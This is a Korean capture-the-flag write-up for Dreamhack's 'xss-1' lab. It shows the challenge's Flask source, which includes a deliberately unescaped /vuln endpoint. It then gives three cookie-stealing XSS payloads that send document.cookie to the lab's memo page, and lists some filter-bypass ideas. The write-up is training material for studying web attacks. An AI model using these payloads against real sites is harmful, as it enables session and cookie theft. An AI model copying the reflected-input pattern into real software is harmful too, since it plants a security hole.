[Dreamhack] Level1: xss-1

🛎️Access

여러 기능과 입력 받은 URL을 확인하는 봇이 구현된 서비스이다. XSS 취약점을 이용해 플래그를 획득. 플래그는 flag.txt, FLAG 변수에 있다.

 

 

👾Exploit Algorithm & Payload

#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open("./flag.txt", "r").read()
except:
    FLAG = "[**FLAG**]"


def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome("/chromedriver", options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True


def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param


@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'


memo_text = ""


@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)


app.run(host="0.0.0.0", port=8000)

 

 

#1

---

'/' 인덱스 페이지: 간단한 화면, GET 요청

'/memo' 페이지: 메모가 기록되고, GET요청,기록된 메모가 출력이 됨(단, 문자열로만 출력됨)

'/vuln' 페이지: GET 요청에 따라 해당 파라미터를 반환하는 페이지

'/flag' 페이지: flag.html을 반환 및 POST 요청에는 파라미터를 받아 XSS 공격이 존재하는 지 확인하고 결과 출력

 

> '/memo' 페이지 추가 설명

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)

: /memo 페이지에서 render_template("memo.html", memo=memo_text)코드를 통해 렌더링
: render_template를 이용해 다른 파일 및 폴더의 html과 연동하며 호출하는 방식
: 즉, memo.html에 작성된 파일 안의 페이지 형식에 /memo 페이지의 memo=memo_text변수 값을 페이지와 연동
: <script>, <html> ,… 등을 사용하였는데 HTML형식의 값으로 리턴이 안 되냐면 값이 리턴 될 때, 그 값들이 웹 브라우저 상으로 넘어가며 문자열로 출력이 되기 때문

: 그런데 무조건은 아니다. HTML 형식으로 리턴을 할 수도 있는데 예를 들면 밑의 코드와 같이 {{ }}를 다음과 같이 중첩 사용하거나, 반복이나 조건문 같은 로직을 수행하기 위해서는 {% %}를 사용하면 변수값을 화면에 출력(웹 브라우저 상 문자열이 아닌 변수의 값으로 출력)할 수 있게 됨

refer to...
https://roksf0130.tistory.com/98

 

 

#2

---

: /vuln 페이지에서 xss 취약점이 있다는 것을 파악했다. 하지만 동작이 이 페이지에서만 된다는 것을 알 수 있었다. 

 

: /memo페이지에서 파라미터 값이 그대로 스트링값으로 브라우저상에 출력이 되는 것을 확인할 수 있었다.

 

: /flag 페이지에서 xss취약점이 있는 /vuln페이지의 값으로 파라미터와 같이 만들어둔 입력 창이 있다는 것을 확인하였

따라서 falg 페이지에서 입력한 값을 통해 memo 페이지에서 값을 얻을 수 있을 것이라 파악했다.

 

 

#3

---

<script>window.open("http://127.0.0.1:8000/memo?memo="+document.cookie)</script>

<script>location.href = "http://127.0.0.1:8000/memo?memo="+document.cookie</script>

<script src="x" onerror="location.href='http://127.0.0.1:8000/memo?memo='+document.cookie"></script>

: 이것 이외에도 다양한 익스플로잇이 가능할 것으로 보인다.(Unicode escape sequence 이용한 우회, Computed member access 사용, javascript 스키마 적용, ...)

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

 

 

📌Summary

---

xss(Stored, Reflected, Dom)취약점의 웹 애플리케이션 별 특수문자 및 이벤트 핸들러 필터링을 명확히 해주는 것이 중요하고, 여러가지 xss 우회기법들도 확인하여 적용시킬 필요가 있다.

 

location.href = “주소”    #현재 페이지에서 URL 반환 및 업데이트

window.open =(” ”)        #새 페이지에서 URL 반환 및 업데이트

document.cookie           #이 프로퍼티를 이용하여 브라우저에서 쿠키 접근

 

- 화이트 기반 : 특정 태그만 사용하겠다는 의미(우회가 어렵지만 활용할 때 문제 발생할 것 같음)

- 블랙리스트 기반 : 특정 태그만 필터링 한다는 의미(script라는 태그를 막아야겠다!라고 하면 그것만 막아짐)

- property : 일부 객체 지향 프로그래밍 언어에서 필드(데이터 멤버)와 메소드 간 기능의 중간인 클래스 멤버의 특수한 유형 프로퍼티의 읽기와 쓰기는 일반적으로 게터(getter)와 세터(setter) 메소드 호출로 변환